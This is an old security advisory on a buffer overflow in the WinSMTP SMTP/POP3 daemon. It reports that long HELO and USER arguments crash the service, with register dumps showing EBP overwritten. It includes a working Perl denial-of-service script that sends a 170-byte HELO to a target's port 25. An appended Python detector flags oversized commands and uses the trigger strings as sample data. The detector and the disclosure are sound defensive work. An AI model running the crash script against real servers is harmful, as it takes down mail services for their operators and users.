COMMAND

    WinSMTP

SYSTEMS AFFECTED

    WinSMTP mailer/pop3d daemon. Versions 1.06f and 2.X

PROBLEM

    'dethy' found the following.  WinSMTP is an Internet Mailer Daemon
    providing SMTP and POP3 support for sending and receiving mail.
    These services can be used by a front end that makes use of the
    UNIX mailbox or POP3 services provided by this product.
    Registration of the shareware version is $50 and $100 for the
    commercial version (USD).  This product is quite old but is still
    supported and available for purchase.

    The vulnerability occurs in a number of fields in both the smtp and
    pop3 daemons, effectively allowing remote code execution on the
    remote host.

    An example of this overflow can be observed in the smtpd by sending
    a long HELO [buffer] command, where [buffer] is approximately 170
    bytes, resulting in the following error:

        WINSMTP caused a general protection fault
        in module WINSMTP.EXE at 0003:00002359.
        Registers:
        EAX=461e0001 CS=42e7 EIP=00002359 EFLGS=00000246
        EBX=00807fe0 SS=4207 ESP=00007e36 EBP=00004141
        ECX=00010283 DS=4207 ESI=0000544c FS=05c7
        EDX=58600000 ES=461e EDI=00001547 GS=0000
        Bytes at CS:EIP:
        cb 49 73 49 63 6f 6e 69 63 00 00 58 4c 6f 63 00
        Stack dump:
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141

    As we can see, 41414141 is "AAAA" (which we had sent), with EBP being
    overwritten (EBP=00004141).  The same can be observed in the pop3d by
    sending a long USER [buffer], where [buffer] is approximately 370
    bytes, resulting in the following error:

        WINSMTP caused a general protection fault
        in module WINSMTP.EXE at 0001:00009e93.
        Registers:
        EAX=00000000 CS=7c9f EIP=00009e93 EFLGS=00000246
        EBX=00007cea SS=77cf ESP=00007e1c EBP=00004141
        ECX=00000362 DS=77cf ESI=00000005 FS=0000
        EDX=0000565f ES=77cf EDI=00002c40 GS=0000
        Bytes at CS:EIP:
        cb 55 8b ec b8 30 01 9a 0c 03 9f 7c 56 57 c7 46
        Stack dump:
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141 41414141 41414141
        41414141 41414141 41414141 41414141

    Since this is a Windows exploit, the offset needed to overwrite the
    correct register will vary from system to system (depending on
    system configuration), so there is no real point in making one.
    Instead, below is a remote DoS that will cause WinSMTP to crash; it
    will then need to be restarted manually.

    #!/usr/bin/perl
    #
    # ./$0.pl -s <server>
    # sends data to smtpd, overflowing the server buffer.
    #
    use strict;
    use warnings;
    use Getopt::Std;
    use IO::Socket;

    my %args;
    getopts('s:', \%args);
    usage() if !defined($args{s});
    my $serv = $args{s};

    # 170 bytes of "A" after HELO is enough to trigger the fault shown above
    my $foo = "A"; my $number = 170;
    my $data = $foo x $number;
    my $EOL = "\015\012";

    my $remote = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $serv,
        PeerPort => "smtp(25)",
    ) || die("Unable to connect to smtp port at $serv\n");
    $remote->autoflush(1);

    print $remote "HELO $data" . $EOL;
    # echo whatever the server sends back until it closes the connection
    while (<$remote>) { print }

    print("\nCrash was successful !\n");

    sub usage { die("\n$0 -s <server>\n\n"); }
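    As an added example (not part of the advisory or of WinSMTP), a small
    Python check that a mail proxy or IDS sensor could run over client
    command lines to flag the two trigger shapes described above: an
    oversized HELO argument on the smtpd and an oversized USER argument on
    the pop3d.  The thresholds are assumptions (HELO is capped well below
    the ~170 bytes that fault WinSMTP; POP3 arguments at the 40-character
    limit RFC 1939 gives), and the traffic lines are constructed.

```python
from dataclasses import dataclass

# Assumed thresholds (not from the advisory): HELO is capped well below
# the ~170 bytes that fault WinSMTP; RFC 1939 caps POP3 arguments at 40.
LIMITS = {
    ("smtp", "HELO"): 128,
    ("smtp", "EHLO"): 128,
    ("pop3", "USER"): 40,
    ("pop3", "PASS"): 40,
}

@dataclass
class Finding:
    proto: str
    verb: str
    arg_len: int
    reason: str

def inspect_line(proto: str, raw: bytes):
    """Return a Finding if one client command line looks like an overflow attempt."""
    verb, _, arg = raw.rstrip(b"\r\n").partition(b" ")
    verb = verb.upper().decode("ascii", "replace")
    limit = LIMITS.get((proto, verb))
    if limit is None:          # a verb this check does not police
        return None
    if len(arg) > limit:
        return Finding(proto, verb, len(arg), f"argument exceeds {limit} bytes")
    # a long run of one repeated byte is the filler seen in the crash dumps (41414141...)
    if len(arg) >= 32 and len(set(arg)) == 1:
        return Finding(proto, verb, len(arg), "argument is a single repeated byte")
    return None

def scan(session):
    """session: iterable of (protocol, raw client line) pairs; returns all findings."""
    return [f for proto, raw in session if (f := inspect_line(proto, raw))]

# Constructed sample traffic: benign lines plus the two trigger shapes above.
SAMPLE = [
    ("smtp", b"HELO mail.example.test\r\n"),
    ("smtp", b"HELO " + b"A" * 170 + b"\r\n"),
    ("pop3", b"USER alice\r\n"),
    ("pop3", b"USER " + b"A" * 370 + b"\r\n"),
    ("pop3", b"PASS s3cret\r\n"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f)
```

    Note that the 170-byte HELO that crashes WinSMTP is well within the
    255-octet domain length SMTP itself permits, so a check based only on
    the RFC limits would not catch it; the per-verb cap has to be tuned to
    what the daemon actually tolerates.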

SOLUTION

    The vendor has been contacted; wait until a patched version comes out
    or use an alternative product.